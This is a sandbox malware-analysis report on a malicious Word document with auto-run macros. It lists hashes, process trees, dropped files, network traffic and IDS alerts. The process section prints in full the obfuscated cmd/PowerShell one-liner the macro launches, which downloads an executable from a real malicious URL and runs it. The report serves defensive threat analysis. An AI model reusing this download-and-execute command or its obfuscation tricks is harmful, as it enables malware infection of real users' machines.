analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

38db088af8cd7d74dba42f80713fe705.docx

Full analysis: https://app.any.run/tasks/c495a89a-a64d-457d-96ed-07a76279de08
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: May 24, 2019, 02:25:08
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
trojan
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

38DB088AF8CD7D74DBA42F80713FE705

SHA1:

735B95C308DDC83D079B6BECDCB2388CD924A2BC

SHA256:

475F625B76C6FD2343A4D82FAB6439E9AA6709452E57DD765A6B0C997D03F0EF

SSDEEP:

1536:nU1DTDu7N9mX/GK7Kxo8JzicfxDnIZwLRWhBPmW1BkmD4+28ES7Kf2ZAv/iXKv+1:UduBmGiOzicRnBLRWhdfkUv7K+Ka6v+1

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 1888)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 1888)
  • SUSPICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 2956)
    • Creates files in the user directory

      • powershell.exe (PID: 1484)
    • Creates files in the Windows directory

      • powershell.exe (PID: 1484)
    • Removes files from Windows directory

      • powershell.exe (PID: 1484)
  • INFO

    • Manual execution by user

      • WINWORD.EXE (PID: 1888)
      • verclsid.exe (PID: 3884)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2944)
      • WINWORD.EXE (PID: 1888)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2944)
      • WINWORD.EXE (PID: 1888)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docm | Word Microsoft Office Open XML Format document (with Macro) (53.6)
.docx | Word Microsoft Office Open XML Format document (24.2)
.zip | Open Packaging Conventions container (18)
.zip | ZIP compressed archive (4.1)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0006
ZipCompression: Deflated
ZipModifyDate: 1980:01:01 00:00:00
ZipCRC: 0x746ff8d9
ZipCompressedSize: 445
ZipUncompressedSize: 1635
ZipFileName: [Content_Types].xml

XML

Template: Normal
TotalEditTime: 1.2 hours
Pages: 2
Words: 1074
Characters: 6124
Application: Microsoft Office Word
DocSecurity: None
Lines: 51
Paragraphs: 14
ScaleCrop: No
HeadingPairs:
  • Title
  • 1
TitlesOfParts: -
Company: office
LinksUpToDate: No
CharactersWithSpaces: 7184
SharedDoc: No
HyperlinksChanged: No
AppVersion: 12
Keywords: -
LastModifiedBy: Пользователь Windows
RevisionNumber: 53
CreateDate: 2019:04:10 10:19:00Z
ModifyDate: 2019:05:21 12:13:00Z

XMP

Title: -
Subject: -
Creator: admin
Description: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
5
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs verclsid.exe no specs winword.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2944"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\38db088af8cd7d74dba42f80713fe705.docx"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3884"C:\Windows\system32\verclsid.exe" /S /C {0B2C9183-C9FA-4C53-AE21-C900B0C39965} /I {0C733A8A-2A1C-11CE-ADE5-00AA0044773D} /X 0x401C:\Windows\system32\verclsid.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Extension CLSID Verification Host
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1888"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\38db088af8cd7d74dba42f80713fe705.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2956c:\\\windows\\\system32\\\cmd /c set p1=powersh&& set s1=ell&& call %p1%%s1% iex('$IandS = naJfygX5KNew-object -comaJfygX5KNobjaJfygX5KNect wscaJfygX5KNript.sheaJfygX5KNll;$GZ2a5C7uS = naJfygX5KNew-object sysaJfygX5KNtem.net.webaJfygX5KNclient;$XtVuQTF = naJfygX5KNew-objaJfygX5KNect ranaJfygX5KNdom;$U3cE5 = \"aJfygX5KNhaJfygX5KNtaJfygX5KNtaJfygX5KNpaJfygX5KN://chlorella.by/wp-content/plugins/apikey/ffl/up.exe\".splaJfygX5KNit(\",\");$rK980 = $XtVuQTF.nexaJfygX5KNt(1, 65536);$LBVyb = \"c:\wiaJfygX5KNnaJfygX5KNdowaJfygX5KNs\temaJfygX5KNp\139.exaJfygX5KNe\";aJfygX5KNforaJfygX5KNeaJfygX5KNach($kIBmn1 iaJfygX5KNn $U3cE5){taJfygX5KNraJfygX5KNy{$GZ2a5C7uS.dowaJfygX5KNnaJfygX5KNloadfile($kIBmn1.ToSaJfygX5KNtring(), $LBVyb);staaJfygX5KNrt-proaJfygX5KNcess $LBVyb;break;}caJfygX5KNatcaJfygX5KNh{}}'.replace('aJfygX5KN', ''));c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1484powershell iex('$IandS = naJfygX5KNew-object -comaJfygX5KNobjaJfygX5KNect wscaJfygX5KNript.sheaJfygX5KNll;$GZ2a5C7uS = naJfygX5KNew-object sysaJfygX5KNtem.net.webaJfygX5KNclient;$XtVuQTF = naJfygX5KNew-objaJfygX5KNect ranaJfygX5KNdom;$U3cE5 = \"aJfygX5KNhaJfygX5KNtaJfygX5KNtaJfygX5KNpaJfygX5KN://chlorella.by/wp-content/plugins/apikey/ffl/up.exe\".splaJfygX5KNit(\",\");$rK980 = $XtVuQTF.nexaJfygX5KNt(1, 65536);$LBVyb = \"c:\wiaJfygX5KNnaJfygX5KNdowaJfygX5KNs\temaJfygX5KNp\139.exaJfygX5KNe\";aJfygX5KNforaJfygX5KNeaJfygX5KNach($kIBmn1 iaJfygX5KNn $U3cE5){taJfygX5KNraJfygX5KNy{$GZ2a5C7uS.dowaJfygX5KNnaJfygX5KNloadfile($kIBmn1.ToSaJfygX5KNtring(), $LBVyb);staaJfygX5KNrt-proaJfygX5KNcess $LBVyb;break;}caJfygX5KNatcaJfygX5KNh{}}'.replace('aJfygX5KN', ''));C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 079
Read events
1 304
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
1
Unknown types
4

Dropped files

PID
Process
Filename
Type
2944WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE02.tmp.cvr
MD5:
SHA256:
2944WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3A9A6EA8-74ED-4FA2-8751-371357EBF28B}.tmp
MD5:
SHA256:
1888WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR5A9B.tmp.cvr
MD5:
SHA256:
1484powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WVCO4WTMKEM4417TIMZY.temp
MD5:
SHA256:
2944WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:AAE1F34939203117AC1F4B1DA330748D
SHA256:A8522EFD13191ED100712611DBB7B818993A3A9AEE4584A1360605C4D2C4BD74
1484powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
1484powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1261a0.TMPbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
1888WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:90305FABB62CC03621343BC6ED5C204D
SHA256:33398AA9AAD946C45CA3BE75D63609D0B1AE6E73709F9B60FA94F1DEF587E93E
1888WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$db088af8cd7d74dba42f80713fe705.docpgc
MD5:9D7C3DC429902A65499507341C36F283
SHA256:52BDA25DFFBBB1933BF808F89BBB7305EDCD61CF536528E9185554AE5E76CC29
1888WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lextext
MD5:F3B25701FE362EC84616A93A45CE9998
SHA256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1484
powershell.exe
GET
404
93.125.99.79:80
http://chlorella.by/wp-content/plugins/apikey/ffl/up.exe
BY
html
16.9 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1484
powershell.exe
93.125.99.79:80
chlorella.by
Republican Unitary Telecommunication Enterprise Beltelecom
BY
malicious

DNS requests

Domain
IP
Reputation
chlorella.by
  • 93.125.99.79
malicious

Threats

PID
Process
Class
Message
1484
powershell.exe
A Network Trojan was detected
ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious
1484
powershell.exe
Potentially Bad Traffic
ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
No debug info